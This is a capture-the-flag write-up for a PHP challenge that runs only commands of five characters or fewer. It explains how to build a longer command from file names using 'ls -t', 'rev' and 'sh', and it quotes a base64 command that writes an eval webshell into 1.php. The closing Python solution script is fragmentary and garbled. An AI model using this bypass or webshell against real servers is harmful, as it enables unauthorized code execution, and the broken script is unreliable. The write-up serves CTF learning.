Rating: 5.0

# Web: Less than 5


## Website:


There is a blank white page. Let's test parameters from challenge description - `cmd` and `reset`



We don't get any output from that. Maybe we should search for some **edge cases** to see how app behaves.


**Null byte** works as always in php scritps. Now we can check how length control is being handled.


Input build of more than 5 characters is **not going throught exec function.**

## Fight with input length:

At first I thought the challenge was about simple command injection.
I tried using `*`, `>` to read flag or index.php but didn't get anything.
The length of 5 was too small to get any progress there.
The only thing that I acomplished was creating files with short names and reading them.
This led me to **executing ls and reading the output.**

That's something. At that moment I knew the challenge is about creating payload from multiple files.
It is also said in challenge description that files are being removed every 2 mins so keep that in mind.

## Research:

After feeling a bit helpless I started to google for **short php** payloads. I stumbled upon few interesting articles.
* [blog.spacepatroldelta.com](https://blog.spacepatroldelta.com/a?ID=01800-96c1d853-a6ab-4a27-b2c5-157e586418d3)
* [blog.csdn.net/](https://blog.csdn.net/nzjdsds/article/details/102940762)

In above articles they are basically spliting the command `echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php` in multiple files.
Then they are using `ls -t>0` to sort files by the time they were created and put all of them into one file - `0`.
When that succeed they execute `0` with `sh 0` and the outcome is `1.php` file with php content - **`0`. This line have much more than 5 chars so how they got around it?


**That's pure magic. How does it even work?**

First we need to understand few commands:
* dir - same as ls
* rev - reverses the input `echo 1234|rev` -> `4321`

So at first they are building a reversed payload. With `*>v` they are calling dir (first file in the folder in alphabetical order) which lists other files and then saves it to `v` file.
Next they uses rev to reverse the payload and move it to another file `0`
Well that works. Pretty crazy way to get around it.

**I found everything that is needed right? Copy, paste, run, didn't work. Unfortunately, it wasn't that simple.**

## Local setup

I created a simple php script that simulates the behavior of the challenge.


After a while I knew what didn't work. When building up a `ls -t` from files there is one diffrence between articles and actual challenge. We also have `index.php` in same directory which breaks the whole payload.


Index.php got between the files and whole thing was messed up. I had to find reversed payload that will go after `index.php`


**Found it!** Below how it works.


# Solution:

Simple python script which creates all the files needed and calls `1.php` endpoint to check if it worked.

import requests

url = "{0}"

with open("payload.txt","r") as f:
for i in f:
print("[*]" + url.format(i.strip()))

test = requests.get("")
if test.status_code == requests.codes.ok:

>\ \\
sh 0
sh n

## FLAG: ictf{5ch4r5_4re_3n0ugh_bd903}

Original writeup (https://github.com/Dom0nS/ctf/blob/main/CTF_writeups/Incognito-ctf-2022/less_than_5.md).